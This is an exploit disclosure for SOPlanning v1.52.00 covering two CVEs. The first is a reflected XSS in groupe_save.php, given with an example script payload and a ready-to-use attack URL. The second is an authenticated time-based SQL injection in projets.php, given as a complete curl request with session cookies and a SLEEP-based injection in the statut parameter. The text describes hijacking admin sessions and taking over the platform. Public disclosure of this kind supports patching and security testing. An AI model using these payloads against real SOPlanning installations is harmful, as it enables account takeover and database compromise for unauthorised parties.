Exploit Title: SOPlanning v1.52.00 'groupe_save.php' XSS (Reflected XSS)
Application: SOPlanning
Version: 1.52.00
Date: 4/22/24
Exploit Author: Joseph McPeters (Liquidsky)
Vendor Homepage: https://www.soplanning.org/en/
Software Link: https://sourceforge.net/projects/soplanning/
Tested on: Linux
CVE: CVE-2024-33724
Exploit: https://github.com/fuzzlove/soplanning-1.52-exploits/blob/main/soplanning-XSS-README.txt
Description: SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.
Example Payload: "><script>alert('LiQUiDSKY')</script><!--
Reflected XSS Link: /soplanning/www/process/groupe_save.php?saved=1&groupe_id="><script>alert('LiQUiDSKY')</script><!--&nom=Project+New
Analysis: The landing page takes into consideration the user input parameter then redirects to a page where the XSS is shown the payload included in the exploit escapes the variable where it is held and comments out the rest to perform a valid reflected XSS attack against any authenticated user including the admin.
Exploit Title: SOPlanning v1.52.00 'projets.php' SQLi
Application: SOPlanning
Version: 1.52.00
Date: 4/22/24
Exploit Author: Joseph McPeters (Liquidsky aka fuzzlove)
Vendor Homepage: https://www.soplanning.org/en/
Software Link: https://sourceforge.net/projects/soplanning/
Tested on: Linux
CVE: CVE-2024-33722
Exploit: https://github.com/fuzzlove/soplanning-1.52-exploits/blob/main/soplanning-sqli-README.txt
Description: SOPlanning v1.52.00 is vulnerable to Authenticated SQL Injection via the 'projects.php' page.
Instructions: Authenticate to the host, the credentials can be obtained using a CSRF exploit (more info included). Once valid credentials are obtained use either a GET/POST request to send the valid parameters that equal to valid SQLi.
Vulnerable request parameters for request to "/www/projets.php":
The above parameters can be sent as either a valid GET/POST request to trigger the SQLi. Example Curl Request To Re-Test SQLi:
curl -i -s -k -X $'POST'
-b $'dateDebut=23/04/2024; dateFin=23/06/2024; xposMoisWin=0; xposJoursWin=0; yposMoisWin=0; yposJoursWin=0; yposProjets=33; PHPSESSID=ovpbclvbc87uh7anfbq2luf9bi; soplanningplanning_=hhrtf0rgs562vm8rhn5i641481; baseLigne=users; baseColonne=jours; afficherTableauRecap=1; masquerLigneVide=0; statut_projet=%5B%22abort%22%2C%22archive%22%2C%22done%22%2C%22progress%22%2C%22todo%22%5D'
--data-binary $'filtreGroupeProjet=1&statut[]=todo'+AND+(SELECT+8073+FROM+(SELECT(SLEEP(10)))PuxA)+AND+'Liquidsky'='Liquidsky&rechercheProjet=test'
Note: Cookies need to be authenticated and request needs to be valid for valid SQLi. This curl request can be used with a proxy to reconstruct a valid request.